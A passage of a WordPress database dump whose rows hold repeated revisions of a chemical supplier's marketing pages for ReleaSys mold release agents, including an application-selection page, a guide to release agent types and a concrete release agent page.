text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-02 16:30:37', '2017-06-02 16:30:37', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4441, 1, '2017-06-02 16:31:20', '2017-06-02 16:31:20', '', 'Specialty Products', '', 'publish', 'closed', 'closed', '', 'specialty-products', '', '', '2017-06-02 16:31:20', '2017-06-02 16:31:20', '', 0, 'https://www.miller-stephenson.com/?p=4441', 10, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4442, 1, '2017-06-02 16:31:20', '2017-06-02 16:31:20', '', 'Specialty Solvents', '', 'publish', 'closed', 'closed', '', 'specialty-solvents', '', '', '2017-06-02 16:31:20', '2017-06-02 16:31:20', '', 0, 'https://www.miller-stephenson.com/?p=4442', 11, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (4443, 1186, '2017-06-02 16:55:41', '2017-06-02 16:55:41', '', '', '', 'publish', 'closed', 'closed', '', '4443', '', '', '2017-06-02 16:55:41', '2017-06-02 16:55:41', '', 0, 'https://www.miller-stephenson.com/nf_sub/4443/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4444, 0, '2017-06-02 17:23:40', '2017-06-02 17:23:40', '', '', '', 'publish', 'closed', 'closed', '', '4444', '', '', '2017-06-02 17:23:40', '2017-06-02 17:23:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/4444/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4446, 1, '2017-06-02 20:05:01', '2017-06-02 20:05:01', '', 'Dan_body', '', 'publish', 'closed', 'closed', '', 'dan_body', '', '', '2017-06-02 20:05:01', '2017-06-02 20:05:01', '', 0, 'https://www.miller-stephenson.com/?post_type=tt_font_control&p=4446', 0, 'tt_font_control', '', 0); 
INSERT INTO `wp_posts` VALUES (4447, 0, '2017-06-02 23:11:28', '2017-06-02 23:11:28', '', '', '', 'publish', 'closed', 'closed', '', '4447', '', '', '2017-06-02 23:11:29', '2017-06-02 23:11:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/4447/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4448, 0, '2017-06-04 10:11:13', '2017-06-04 10:11:13', '', '', '', 'publish', 'closed', 'closed', '', '4448', '', '', '2017-06-04 10:11:14', '2017-06-04 10:11:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/4448/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4452, 3, '2017-06-04 18:00:33', '2017-06-04 18:00:33', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4430"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Custom Formulations</h2>\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-04 18:00:33', '2017-06-04 18:00:33', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4453, 3, '2017-06-05 12:16:26', '2017-06-05 12:16:26', '<h2>Mold Release Agent: Which is right for you?</h2>\r\nMold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agent are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Reactive polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason, manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and reactive polysiloxanes.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release agent solutions for it customers, hence our companies specializes in providing advanced release chemistry. Our company is 100% back-integrated meaning our manufacturing, inventory, and quality are maintained regardless of fluctuations in the market.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n<h3><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Dry Film Mold Release Agents</strong></a></h3>\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents (MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform dry, thin films that exhibit excellent surface adhesion and durability. Miller-Stephenson PTFE release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.\r\n\r\nProduction engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. Our PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n<h3><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">Reactive polysiloxanes</a> (ReleaSys™) Mold Release Agent</strong></h3>\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release, cycle after cycle.[/caption]\r\n\r\nReactive polysiloxanes are the newest generation of mold release agent, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F. Other reactive siloxanes provide a rapid cure, even at room temperature, with a minimum reduction in durability and abrasion reisistance.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in irregular curing and tranfser can occur.  Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.\r\n\r\nMiller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys™ product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys™ is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n<h3>Innovative Chemistry, Superior Cost-Effectiveness, and Unmatched Technical Service</h3>\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16,20" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n 	<li><strong><a href="https://en.wikipedia.org/wiki/Release_agent">Understanding Release Agents</a></strong></li>\r\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2017-06-05 12:16:26', '2017-06-05 12:16:26', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4454, 0, '2017-06-05 13:07:42', '2017-06-05 13:07:42', '', '', '', 'publish', 'closed', 'closed', '', '4454', '', '', '2017-06-05 13:07:42', '2017-06-05 13:07:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/4454/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4455, 0, '2017-06-05 16:17:25', '2017-06-05 16:17:25', '', '', '', 'publish', 'closed', 'closed', '', '4455', '', '', '2017-06-05 16:17:25', '2017-06-05 16:17:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/4455/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4457, 2, '2017-06-05 18:35:19', '2017-06-05 18:35:19', '<h2>ReleaSys™ CR - Concrete Release Agent</h2>\n<h3>Superior Chemistry for all Concrete Release Agent Applications</h3>\nMiller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns.  Most importantly, ReleaSys CR achieves all of this in a highly efficient and cost-effective system. At Miller-Stephenson, we understand that mold life and part de-molding are points of critical performance for concrete and stone veneer manufacturing. These aspects of the process are where Miller-Stephenson\'s concrete release agent products can improve your productivity and part quality. The ReleaSys line of mold release agents provide a competitive advantage to the largest and smallest manufacturers alike with water-based release agent solutions that can maximize productivity, while meeting the most demanding specifications and operating conditions. ReleaSys CR concrete release agents for concrete and masonry veneer manufacturers provide:\n<ul>\n 	<li>Extended service life of flexible molds</li>\n 	<li>Minimization/Elimination of "bug-holes"</li>\n 	<li>Optimal pigment transfer and color appearance</li>\n 	<li>Improved release ease</li>\n 	<li>Cleaner, safer environments</li>\n 	<li>Higher quality parts</li>\n 	<li>Less downtime; Lower scrap rates</li>\n 	<li>Cleaner molds</li>\n</ul>\n<h3>ReleaSys CR - Minimizes scrap rates and maintains color pigmentations</h3>\nConcrete is one of the most widely utilized materials for building and construction projects globally. In the majority of cases, there is a very limited need for release agents in conjunction with the use of concrete, and even less of a need for highly specialized release agents such as those developed by Miller-Stephenson. However, in applications where concrete is utilized to mimic the appearance of natural stones (veneer/masonry stone) or in instances where the concrete is meant to be exposed for aesthetic appearances, such as in architectural concrete applications, then high-performance concrete release agents should be utilized. ReleaSys CR is ideally suited to provide the necessary barrier to protect mold surfaces while allowing consistent, uniform release of your intricate concrete designs.\n\nReleaSys CR provides the best technology and most economical way to produce visually pleasing concrete for interior and exterior applications. They are available in various chemistries that are specially formulated for the release of glass-fiber reinforced concrete (GFRC), precast, and composite reinforced concrete from molds made of polyurethane, silicone, rubber, epoxy, and fiberglass. <span style="text-decoration: underline;">Our concrete release agent does not stain or transfer to the surface, finished parts are color-ready and paint-ready.</span>\n\n&nbsp;\n\n<a href="https://www.miller-stephenson.com/mold-release-application-guide/">For help with application or troubleshooting concerns while using ReleaSys.</a>', 'ReleaSys™ CR | Concrete Release Agent', 'Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns.  Most importantly, ReleaSys CR achieves all of this in a highly efficient and cost-effective system. Benefits Include"\n<ul>\n 	<li>Extended service life of flexible molds</li>\n 	<li>Minimization/Elimination of "bug-holes"</li>\n 	<li>Optimal pigment transfer and color appearance</li>\n 	<li>Improved release ease</li>\n</ul>', 'inherit', 'closed', 'closed', '', '4288-autosave-v1', '', '', '2017-06-05 18:35:19', '2017-06-05 18:35:19', '', 4288, 'https://www.miller-stephenson.com/4288-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4458, 0, '2017-06-05 19:36:36', '2017-06-05 19:36:36', '', '', '', 'publish', 'closed', 'closed', '', '4458', '', '', '2017-06-05 19:36:37', '2017-06-05 19:36:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/4458/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4459, 0, '2017-06-06 09:17:50', '2017-06-06 09:17:50', '', '', '', 'publish', 'closed', 'closed', '', '4459', '', '', '2017-06-06 09:17:50', '2017-06-06 09:17:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/4459/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4460, 0, '2017-06-06 12:17:31', '2017-06-06 12:17:31', '', '', '', 'publish', 'closed', 'closed', '', '4460', '', '', '2017-06-06 12:17:31', '2017-06-06 12:17:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/4460/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4461, 3, '2017-06-06 13:39:57', '2017-06-06 13:39:57', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider align="center"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider align="center" width="500px"]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s 